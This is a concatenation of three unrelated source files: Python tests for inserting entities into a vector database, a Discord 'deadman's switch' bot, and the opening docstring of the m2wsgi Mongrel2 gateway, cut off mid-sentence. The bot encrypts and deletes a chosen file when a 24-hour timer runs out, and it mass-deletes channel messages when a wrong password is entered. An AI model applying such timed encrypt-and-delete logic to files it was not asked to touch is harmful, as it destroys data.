@pytest.mark.tags(CaseLabel.L0)
def test_insert_partition(self, connect, collection):
"""
target: test insert entities in collection created before
method: create collection and insert entities in it, with the partition_name param
expected: the collection row count equals to nq
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
assert connect.has_partition(collection, default_tag)
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
# TODO
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_partition_with_ids(self, connect, id_collection):
"""
target: test insert entities in collection created before, insert with ids
method: create collection and insert entities in it, with the partition_name param
expected: the collection row count equals to nq
"""
connect.create_partition(id_collection, default_tag)
ids = [i for i in range(default_nb)]
entities = ut.gen_entities(default_nb)
entities[0]["values"] = ids
result = connect.insert(id_collection, entities, partition_name=default_tag)
assert result.primary_keys == ids
logging.getLogger().info(connect.describe_collection(id_collection))
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_default_partition(self, connect, collection):
"""
target: test insert entities into default partition
method: create partition and insert info collection without tag params
expected: the collection row count equals to nb
"""
result = connect.insert(collection, default_entities, partition_name=ut.default_partition_name)
assert len(result.primary_keys) == default_nb
connect.flush([collection])
stats = connect.get_collection_stats(collection)
assert stats[row_count] == default_nb
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_partition_not_existed(self, connect, collection):
"""
target: test insert entities in collection created before
method: create collection and insert entities in it, with the not existed partition_name param
expected: error raised
"""
tag = ut.gen_unique_str()
with pytest.raises(Exception) as e:
connect.insert(collection, default_entities, partition_name=tag)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_partition_repeatedly(self, connect, collection):
"""
target: test insert entities in collection created before
method: create collection and insert entities in it repeatly, with the partition_name param
expected: the collection row count equals to nq
"""
connect.create_partition(collection, default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
result = connect.insert(collection, default_entities, partition_name=default_tag)
connect.flush([collection])
res = connect.get_collection_stats(collection)
assert res[row_count] == 2 * default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_dim_not_matched(self, connect, collection):
"""
target: test insert entities, the vector dimension is not equal to the collection dimension
method: the entities dimension is half of the collection dimension, check the status
expected: error raised
"""
vectors = ut.gen_vectors(default_nb, int(ut.default_dim) // 2)
insert_entities = copy.deepcopy(default_entities)
insert_entities[-1]["values"] = vectors
with pytest.raises(Exception) as e:
connect.insert(collection, insert_entities)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_name_not_match(self, connect, collection):
"""
target: test insert entities, with the entity field name updated
method: update entity field name
expected: error raised
"""
tmp_entity = ut.update_field_name(copy.deepcopy(default_entity), "int64", "int64new")
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_field_type_not_match(self, connect, collection):
"""
target: test insert entities, with the entity field type updated
method: update entity field type
expected: error raised
"""
tmp_entity = ut.update_field_type(copy.deepcopy(default_entity), "int64", DataType.FLOAT)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_field_value_not_match(self, connect, collection):
"""
target: test insert entities, with the entity field value updated
method: update entity field value
expected: error raised
"""
tmp_entity = ut.update_field_value(copy.deepcopy(default_entity), DataType.FLOAT, 's')
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_more(self, connect, collection):
"""
target: test insert entities, with more fields than collection schema
method: add entity field
expected: error raised
"""
tmp_entity = ut.add_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_vector_more(self, connect, collection):
"""
target: test insert entities, with more fields than collection schema
method: add entity vector field
expected: error raised
"""
tmp_entity = ut.add_vector_field(default_nb, ut.default_dim)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_less(self, connect, collection):
"""
target: test insert entities, with less fields than collection schema
method: remove entity field
expected: error raised
"""
tmp_entity = ut.remove_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_field_vector_less(self, connect, collection):
"""
target: test insert entities, with less fields than collection schema
method: remove entity vector field
expected: error raised
"""
tmp_entity = ut.remove_vector_field(copy.deepcopy(default_entity))
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_no_field_vector_value(self, connect, collection):
"""
target: test insert entities, with no vector field value
method: remove entity values of vector field
expected: error raised
"""
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["values"]
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_no_field_vector_type(self, connect, collection):
"""
target: test insert entities, with no vector field type
method: remove entity vector field
expected: error raised
"""
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["type"]
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_with_no_field_vector_name(self, connect, collection):
"""
target: test insert entities, with no vector field name
method: remove entity vector field
expected: error raised
"""
tmp_entity = copy.deepcopy(default_entity)
del tmp_entity[-1]["name"]
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
# todo fix timeout
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.timeout(30)
def test_collection_insert_rows_count_multi_threading(self, args, collection):
"""
target: test collection rows_count is correct or not with multi threading
method: create collection and insert entities in it(idmap),
assert the value returned by count_entities method is equal to length of entities
expected: the count is equal to the length of entities
"""
if args["handler"] == "HTTP":
pytest.skip("Skip test in http mode")
thread_num = 8
threads = []
milvus = ut.get_milvus(host=args["ip"], port=args["port"], handler=args["handler"], try_connect=False)
def insert(thread_i):
logging.getLogger().info("In thread-%d" % thread_i)
result = milvus.insert(collection, default_entities)
milvus.flush([collection])
for i in range(thread_num):
x = threading.Thread(target=insert, args=(i,))
threads.append(x)
x.start()
for th in threads:
th.join()
stats = milvus.get_collection_stats(collection)
assert stats[row_count] == thread_num * default_nb
# TODO: unable to set config
@pytest.mark.tags(CaseLabel.L2)
def _test_insert_disable_auto_flush(self, connect, collection):
"""
target: test insert entities, with disable autoflush
method: disable autoflush and insert, get entity
expected: the count is equal to 0
"""
delete_nums = 500
ut.disable_flush(connect)
result = connect.insert(collection, default_entities)
ids = result.primary_keys
res = connect.get_entity_by_id(collection, ids[:delete_nums])
assert len(res) == delete_nums
assert res[0] is None
class TestInsertBinary:
@pytest.fixture(
scope="function",
params=ut.gen_binary_index()
)
def get_binary_index(self, request):
request.param["metric_type"] = "JACCARD"
return request.param
@pytest.mark.tags(CaseLabel.L0)
def test_insert_binary_entities(self, connect, binary_collection):
"""
target: test insert entities in binary collection
method: create collection and insert binary entities in it
expected: the collection row count equals to nb
"""
result = connect.insert(binary_collection, default_binary_entities)
assert len(result.primary_keys) == default_nb
connect.flush([binary_collection])
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_binary_partition(self, connect, binary_collection):
"""
target: test insert entities and create partition tag
method: create collection and insert binary entities in it, with the partition_name param
expected: the collection row count equals to nb
"""
connect.create_partition(binary_collection, default_tag)
result = connect.insert(binary_collection, default_binary_entities, partition_name=default_tag)
assert len(result.primary_keys) == default_nb
assert connect.has_partition(binary_collection, default_tag)
connect.flush([binary_collection])
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_binary_multi_times(self, connect, binary_collection):
"""
target: test insert entities multi times and final flush
method: create collection and insert binary entity multi and final flush
expected: the collection row count equals to nb
"""
for i in range(default_nb):
result = connect.insert(binary_collection, default_binary_entity)
assert len(result.primary_keys) == 1
connect.flush([binary_collection])
stats = connect.get_collection_stats(binary_collection)
assert stats[row_count] == default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_binary_after_create_index(self, connect, binary_collection, get_binary_index):
"""
target: test insert binary entities after build index
method: build index and insert entities
expected: no error raised
"""
connect.create_index(binary_collection, binary_field_name, get_binary_index)
result = connect.insert(binary_collection, default_binary_entities)
assert len(result.primary_keys) == default_nb
connect.flush([binary_collection])
index = connect.describe_index(binary_collection, "")
ut.create_target_index(get_binary_index, binary_field_name)
assert index == get_binary_index
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_binary_create_index(self, connect, binary_collection, get_binary_index):
"""
target: test build index insert after vector
method: insert vector and build index
expected: no error raised
"""
result = connect.insert(binary_collection, default_binary_entities)
assert len(result.primary_keys) == default_nb
connect.flush([binary_collection])
connect.create_index(binary_collection, binary_field_name, get_binary_index)
index = connect.describe_index(binary_collection, "")
ut.create_target_index(get_binary_index, binary_field_name)
assert index == get_binary_index
@pytest.mark.tags(CaseLabel.L0)
def test_insert_binary_search(self, connect, binary_collection):
"""
target: test search vector after insert vector after a while
method: insert vector, sleep, and search collection
expected: no error raised
"""
result = connect.insert(binary_collection, default_binary_entities)
connect.flush([binary_collection])
query, vecs = ut.gen_query_vectors(binary_field_name, default_binary_entities, ut.default_top_k, 1,
metric_type="JACCARD")
connect.load_collection(binary_collection)
res = connect.search(binary_collection, query)
logging.getLogger().debug(res)
assert len(res[0]) == ut.default_top_k
class TestInsertAsync:
@pytest.fixture(scope="function", autouse=True)
def skip_http_check(self, args):
if args["handler"] == "HTTP":
pytest.skip("skip in http mode")
@pytest.fixture(
scope="function",
params=[
1,
1000
],
)
def insert_count(self, request):
yield request.param
def check_status(self, result):
logging.getLogger().info("In callback check status")
assert not result
def check_result(self, result):
logging.getLogger().info("In callback check results")
assert result
@pytest.mark.tags(CaseLabel.L0)
def test_insert_async(self, connect, collection, insert_count):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
nb = insert_count
future = connect.insert(collection, ut.gen_entities(nb), _async=True)
ids = future.result().primary_keys
connect.flush([collection])
assert len(ids) == nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_false(self, connect, collection, insert_count):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
nb = insert_count
result = connect.insert(collection, ut.gen_entities(nb), _async=False)
# ids = future.result()
connect.flush([collection])
assert len(result.primary_keys) == nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_async_callback(self, connect, collection, insert_count):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
nb = insert_count
future = connect.insert(collection, ut.gen_entities(nb), _async=True, _callback=self.check_result)
future.done()
ids = future.result().primary_keys
assert len(ids) == nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_long(self, connect, collection):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
nb = 50000
future = connect.insert(collection, ut.gen_entities(nb), _async=True, _callback=self.check_result)
result = future.result()
assert len(result.primary_keys) == nb
connect.flush([collection])
stats = connect.get_collection_stats(collection)
logging.getLogger().info(stats)
assert stats[row_count] == nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_callback_timeout(self, connect, collection):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
nb = 100000
future = connect.insert(collection, ut.gen_entities(nb), _async=True, _callback=self.check_status, timeout=1)
with pytest.raises(Exception) as e:
result = future.result()
@pytest.mark.tags(CaseLabel.L0)
def test_insert_async_invalid_params(self, connect):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
collection_new = ut.gen_unique_str()
future = connect.insert(collection_new, default_entities, _async=True)
future.done()
with pytest.raises(Exception) as e:
result = future.result()
# 1339
@pytest.mark.tags(CaseLabel.L2)
def test_insert_async_invalid_params_raise_exception(self, connect, collection):
"""
target: test insert vectors with different length of vectors
method: set different vectors as insert method params
expected: length of ids is equal to the length of vectors
"""
entities = []
future = connect.insert(collection, entities, _async=True)
future.done()
with pytest.raises(Exception) as e:
future.result()
class TestInsertMultiCollections:
"""
******************************************************************
The following cases are used to test `insert` function
******************************************************************
"""
@pytest.fixture(
scope="function",
params=ut.gen_simple_index()
)
def get_simple_index(self, request, connect):
logging.getLogger().info(request.param)
# if str(connect._cmd("mode")) == "CPU":
# if request.param["index_type"] in index_cpu_not_support():
# pytest.skip("sq8h not support in CPU mode")
return request.param
@pytest.mark.tags(CaseLabel.L2)
def test_insert_entity_multi_collections(self, connect):
"""
target: test insert entities
method: create 10 collections and insert entities into them in turn
expected: row count
"""
collection_num = 10
collection_list = []
for i in range(collection_num):
collection_name = ut.gen_unique_str(uid)
collection_list.append(collection_name)
connect.create_collection(collection_name, default_fields)
result = connect.insert(collection_name, default_entities)
connect.flush([collection_name])
assert len(result.primary_keys) == default_nb
stats = connect.get_collection_stats(collection_name)
assert stats[row_count] == default_nb
for i in range(collection_num):
connect.drop_collection(collection_list[i])
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_drop_collection_insert_entity_another(self, connect, collection):
"""
target: test insert vector to collection_1 after collection_2 deleted
method: delete collection_2 and insert vector to collection_1
expected: row count equals the length of entities inserted
"""
collection_name = ut.gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
connect.drop_collection(collection)
result = connect.insert(collection_name, default_entity)
connect.flush([collection_name])
assert len(result.primary_keys) == 1
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_create_index_insert_entity_another(self, connect, collection, get_simple_index):
"""
target: test insert vector to collection_2 after build index for collection_1
method: build index and insert vector
expected: status ok
"""
collection_name = ut.gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
connect.create_index(collection, field_name, get_simple_index)
result = connect.insert(collection_name, default_entity)
assert len(result.primary_keys) == 1
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection, "")
ut.create_target_index(get_simple_index, field_name)
assert index == get_simple_index
connect.drop_collection(collection_name)
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_entity_create_index_another(self, connect, collection, get_simple_index):
"""
target: test insert vector to collection_2 after build index for collection_1
method: build index and insert vector
expected: status ok
"""
collection_name = ut.gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
result = connect.insert(collection, default_entity)
connect.flush([collection])
connect.create_index(collection_name, field_name, get_simple_index)
if get_simple_index["index_type"] != "FLAT":
index = connect.describe_index(collection_name, "")
ut.create_target_index(get_simple_index, field_name)
assert index == get_simple_index
stats = connect.get_collection_stats(collection)
assert stats[row_count] == 1
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_entity_sleep_create_index_another(self, connect, collection, get_simple_index):
"""
target: test insert vector to collection_2 after build index for collection_1 for a while
method: build index and insert vector
expected: status ok
"""
collection_name = ut.gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
result = connect.insert(collection, default_entity)
connect.flush([collection])
connect.create_index(collection_name, field_name, get_simple_index)
stats = connect.get_collection_stats(collection)
assert stats[row_count] == 1
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_search_entity_insert_entity_another(self, connect, collection):
"""
target: test insert entity to collection_1 after search collection_2
method: search collection and insert entity
expected: status ok
"""
collection_name = ut.gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
connect.load_collection(collection)
res = connect.search(collection, default_single_query)
assert len(res[0]) == 0
connect.insert(collection_name, default_entity)
connect.flush([collection_name])
stats = connect.get_collection_stats(collection_name)
assert stats[row_count] == 1
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L0)
def test_insert_entity_search_entity_another(self, connect, collection):
"""
target: test insert entity to collection_1 after search collection_2
method: search collection and insert entity
expected: status ok
"""
collection_name = ut.gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
result = connect.insert(collection, default_entity)
connect.flush([collection])
connect.load_collection(collection_name)
res = connect.search(collection_name, default_single_query)
stats = connect.get_collection_stats(collection)
assert stats[row_count] == 1
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_entity_sleep_search_entity_another(self, connect, collection):
"""
target: test insert entity to collection_1 after search collection_2 a while
method: search collection, sleep, and insert entity
expected: status ok
"""
collection_name = ut.gen_unique_str(uid)
connect.create_collection(collection_name, default_fields)
result = connect.insert(collection, default_entity)
connect.flush([collection])
connect.load_collection(collection_name)
res = connect.search(collection_name, default_single_query)
assert len(res[0]) == 0
@pytest.mark.timeout(ADD_TIMEOUT)
@pytest.mark.tags(CaseLabel.L2)
def _test_insert_entity_during_release_collection(self, connect, collection):
"""
target: test insert entity during release
method: release collection async, then do insert operation
expected: insert ok
"""
for i in range(10):
connect.insert(collection, default_entities)
connect.flush([collection])
connect.load_collection(collection)
def release():
connect.release_collection(collection)
t = threading.Thread(target=release, args=(collection,))
t.start()
result = connect.insert(collection, default_entities)
assert len(result.primary_keys) == default_nb
class TestInsertInvalid(object):
"""
Test inserting vectors with invalid collection names
"""
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_field_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_field_type(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_field_int_value(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_ints()
)
def get_entity_id(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_vectors()
)
def get_field_vectors_value(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_insert_ids_invalid(self, connect, id_collection, get_entity_id):
"""
target: test insert, with using customize ids, which are not int64
method: create collection and insert entities in it
expected: raise an exception
"""
entity_id = get_entity_id
ids = [entity_id for _ in range(default_nb)]
with pytest.raises(Exception):
connect.insert(id_collection, default_entities, ids)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_collection_name(self, connect, get_collection_name):
"""
target: test insert with invalid scenario
method: insert with invalid collection name
expected: raise exception
"""
collection_name = get_collection_name
with pytest.raises(Exception):
connect.insert(collection_name, default_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_partition_name(self, connect, collection, get_tag_name):
"""
target: test insert with invalid scenario
method: insert with invalid partition name
expected: raise exception
"""
tag_name = get_tag_name
connect.create_partition(collection, default_tag)
if tag_name is not None:
with pytest.raises(Exception):
connect.insert(collection, default_entity, partition_name=tag_name)
else:
connect.insert(collection, default_entity, partition_name=tag_name)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_name(self, connect, collection, get_field_name):
tmp_entity = ut.update_field_name(copy.deepcopy(default_entity), "int64", get_field_name)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_type(self, connect, collection, get_field_type):
field_type = get_field_type
tmp_entity = ut.update_field_type(copy.deepcopy(default_entity), 'float', field_type)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_value(self, connect, collection, get_field_int_value):
"""
target: test insert with invalid field
method: insert with invalid field value
expected: raise exception
"""
field_value = get_field_int_value
tmp_entity = ut.update_field_type(copy.deepcopy(default_entity), 'int64', field_value)
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_entity_value(self, connect, collection, get_field_vectors_value):
"""
target: test insert with invalid entity
method: insert with invalid entity value
expected: raise exception
"""
tmp_entity = copy.deepcopy(default_entity)
src_vector = tmp_entity[-1]["values"]
src_vector[0][1] = get_field_vectors_value
with pytest.raises(Exception):
connect.insert(collection, tmp_entity)
class TestInsertInvalidBinary(object):
"""
Test inserting vectors with invalid collection names
"""
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_collection_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_tag_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_field_name(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_field_type(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_strs()
)
def get_field_int_value(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_ints()
)
def get_entity_id(self, request):
yield request.param
@pytest.fixture(
scope="function",
params=ut.gen_invalid_vectors()
)
def get_field_vectors_value(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_name(self, connect, binary_collection, get_field_name):
"""
target: test insert with invalid field name
method: insert with invalid field name
expected: raise exception
"""
tmp_entity = ut.update_field_name(copy.deepcopy(default_binary_entity), "int64", get_field_name)
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_value(self, connect, binary_collection, get_field_int_value):
tmp_entity = ut.update_field_type(copy.deepcopy(default_binary_entity), 'int64', get_field_int_value)
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_entity_value(self, connect, binary_collection, get_field_vectors_value):
"""
target: test insert with invalid scenario
method: insert with invalid field entity
expected: raise exception
"""
tmp_entity = copy.deepcopy(default_binary_entity)
src_vectors = tmp_entity[-1]["values"]
src_vectors[0] = get_field_vectors_value
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_ids_invalid(self, connect, binary_id_collection, get_entity_id):
"""
target: test insert, with using customize ids, which are not int64
method: create collection and insert entities in it
expected: raise an exception
"""
entity_id = get_entity_id
ids = [entity_id for _ in range(default_nb)]
with pytest.raises(Exception):
connect.insert(binary_id_collection, default_binary_entities, ids)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_type(self, connect, binary_collection, get_field_type):
"""
target: test insert with invalid field type
method: insert with invalid field type
expected: raise exception
"""
field_type = get_field_type
tmp_entity = ut.update_field_type(copy.deepcopy(default_binary_entity), 'int64', field_type)
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entity)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_with_invalid_field_entities_value(self, connect, binary_collection, get_field_vectors_value):
"""
target: test insert with invalid field
method: insert with invalid field value
expected: raise exception
"""
tmp_entities = copy.deepcopy(default_binary_entities)
src_vector = tmp_entities[-1]["values"]
src_vector[1] = get_field_vectors_value
with pytest.raises(Exception):
connect.insert(binary_collection, tmp_entities)
|
discord_bot.py | # Discord bot for deadman's switch
import discord # For discord bot interface
from discord.ext import commands
import hashlib # To hash inputted password and verify hashes
from time import *
import threading # To run main(), timer() and the bot in parallel
import datetime # For timer()
import pyAesCrypt # To encrypt files in payload()
import os
###################################### Functions ######################################################
# Timer function
def timer():
global time_left
global time_out
time_out = False
time_left = datetime.timedelta(hours=24) # Set here time
while time_left >= datetime.timedelta(seconds=1):
time_left -= datetime.timedelta(seconds=1)
sleep(1)
if time_left <= datetime.timedelta(seconds=1):
time_out = True
print("Time over")
return True
# Threading settings to run timer on background
timer_thread = threading.Thread(target=timer)
timer_thread.start()
# Authentication function
def auth(password):
hash = b"putyourhashinhere" # Set password hash
hashed_pwd = hashlib.sha512(password.encode("utf-8")).hexdigest().encode("utf-8")
if hashed_pwd == hash:
return True
else:
return False
# Payload from original deadman's switch
def FirePayload(filePath, encryptPass):
print("Deadman don't talk")
bufferSize = 64 * 1024 # encryption/decryption buffer size - 64K
pyAesCrypt.encryptFile(filePath, (filePath+'.aes'), encryptPass, bufferSize) # encrypt
# secure_delete.secure_random_seed_init() # Secure delete module available for Windows and Linux
# secure_delete.secure_delete(filePath)
os.remove(filePath) # Deletes path of file, DOES NOT ACTUALLY OVERRWRITE/SECURE-DELETE FILE
print("SWITCH ACTIVATED - LOCKDOWN MODE ENTERED")
exit()
# Main function to setup encryption
def main():
global time_out
filePath = input("Insert file path: ")
encryptPass = input("Insert pass to decrypt: ")
while timer(): # Check when timer runs out
print("Main got timeout true")
FirePayload(filePath, encryptPass)
# Threading settings to run setup on background
main_thread = threading.Thread(target=main)
################################ DISCORD-BOT Section ###################################################################
client = commands.Bot(command_prefix='-')
token = 'putyourtokeninhere' # Put your discord bot login token in here
# bot set up
@client.event
async def on_ready():
await client.change_presence(status=discord.Status.idle, activity=discord.Game('Admin Check'))
main_thread.start()
print("Bot is ready")
# someone enters server
@client.event
async def on_member_join(member):
print(f'{member} has joined the server.')
# someone leaves server
@client.event
async def on_member_remove(member):
print(f'{member} has left the server.')
# ping command
@client.command()
async def ping(ctx):
await ctx.send(f'Command activated {round(client.latency * 1000)}ms')
# error handler
@client.event
async def on_command_error(ctx):
await ctx.send("Error")
print("User error")
pass
# clear command
@client.command()
async def clear(ctx, amount=5):
await ctx.channel.purge(limit=amount)
# time left before destruction
@client.command()
async def time(ctx):
global time_left
await ctx.send(f'Time remaining before Self-destruction: {time_left}')
# deactivate command
@client.command()
async def l(ctx, *, pwd):
global time_out
password = f'{pwd}'
auth(password)
if auth(password):
if time_out is False:
await ctx.channel.purge(limit=1)
await ctx.send(f'Switch reset')
global time_left
time_left = datetime.timedelta(hours=24) # Set here time
else:
await ctx.send(f'Too late... ')
else:
await ctx.send(f'Wrong code, Impostor')
await ctx.channel.purge(limit=200)
client.run(token)
|
__init__.py | """
m2wsgi: a mongrel2 => wsgi gateway and helper tools
====================================================
This module provides a WSGI gateway handler for the Mongrel2 webserver,
allowing easy deployment of python apps on Mongrel2. It provides full support
for chunked response encoding, streaming reads of large file uploads, and
pluggable backends for evented I/O a la eventlet.
You might also find its supporting classes useful for developing non-WSGI
handlers in python.
Command-line usage
------------------
The simplest way to use this package is as a command-line launcher::
m2wsgi dotted.app.name tcp://127.0.0.1:9999
This will connect to Mongrel2 on the specified request port and start handling
requests by passing them through the specified WSGI app. By default you will
get a single worker thread handling all requests, which is probably not what
you want; increase the number of threads like so::
m2wsgi --num-threads=5 dotted.app.name tcp://127.0.0.1:9999
If threads aren't your thing, you can just start several instances of the
handler pointing at the same zmq socket and get the same effect. Better yet,
you can use eventlet to shuffle the bits around like so::
m2wsgi --io=eventlet dotted.app.name tcp://127.0.0.1:9999
You can also use --io=gevent if that's how you roll. Contributions for
other async backends are most welcome.
Programmatic Usage
------------------
If you have more complicated needs, you can use m2wsgi from within your
application. The main class is 'WSGIHandler' which provides a simple
server interface. The equivalent of the above command-line usage is::
from m2wsgi.io.standard import WSGIHandler
handler = WSGIHandler(my_wsgi_app,"tcp://127.0.0.1:9999")
handler.serve()
There are a lot of "sensible defaults" being filled in here. It assumes
that the Mongrel2 recv socket is on the next port down from the send socket,
and that it's OK to connect the socket without a persistent identity.
For finer control over the connection between your handler and Mongrel2,
create your own Connection object. Here we use 127.0.0.1:9999 as the send
socket with identity AA-BB-CC, and use 127.0.0.2:9992 as the recv socket::
from m2wsgi.io.standard import WSGIHandler, Connection
conn = Connection(send_sock="tcp://AA-BB-CC@127.0.0.1:9999",
recv_sock="tcp://127.0.0.1:9992")
handler = WSGIHandler(my_wsgi_app,conn)
handler.serve()
If you're creating non-WSGI handlers for Mongrel2 you might find the following
classes useful:
:Connection: represents the connection from your handler to Mongrel2,
through which you can read requests and send responses.
:Client: represents a client connected to the server, to whom you
can send data at any time.
:Request: represents a client request to which you can asynchronously
send response data at any time.
:Handler: a base class for implementing handlers, with nothing
WSGI-specific in it.
Middleware
----------
If you need to add fancy features to the server, you can specify additional
WSGI middleware that should be applied around the application. For example,
m2wsgi provides a gzip-encoding middleware that can be used to compress
response data::
m2wsgi --middleware=GZipMiddleware
dotted.app.name tcp://127.0.0.1:9999
If you want additional compression at the expense of WSGI compliance, you
can also do some in-server buffering before the gzipping is applied::
m2wsgi --middleware=GZipMiddleware
--middleware=BufferMiddleware
dotted.app.name tcp://127.0.0.1:9999
The default module for loading middleware is m2wsgi.middleware; specify a
full dotted name to load a middleware class from another module.
Devices
-------
This module also provides a number of pre-built "devices" - stand-alone
executables designed to perform a specific common task. Currently availble
devices are:
:dispatcher: implements a more flexible request-routing scheme than
the standard mongrel2 PUSH socket.
:response: implements a simple canned response, with ability to
interpolate variables from the request.
Don't we already have one of these?
-----------------------------------
Yes, there are several existing WSGI gateways for Mongrel2:
* https://github.com/berry/Mongrel2-WSGI-Handler
* https://bitbucket.org/dholth/mongrel2_wsgi
None of them fully met my needs. In particular, this package has transparent
support for:
* chunked response encoding
* streaming reads of large "async upload" requests
* pluggable IO backends (e.g. eventlet, gevent)
It's also designed from the ground up specifically for Mongrel2. This means
it gets a lot of functionality for free, and the code is simpler and lighter
as a result.
For example, there is no explicit management of a threadpool and request queue
as you might find in e.g. the CherryPy server. Instead, you just start up
as many threads as you need, have them all connect to the same handler socket,
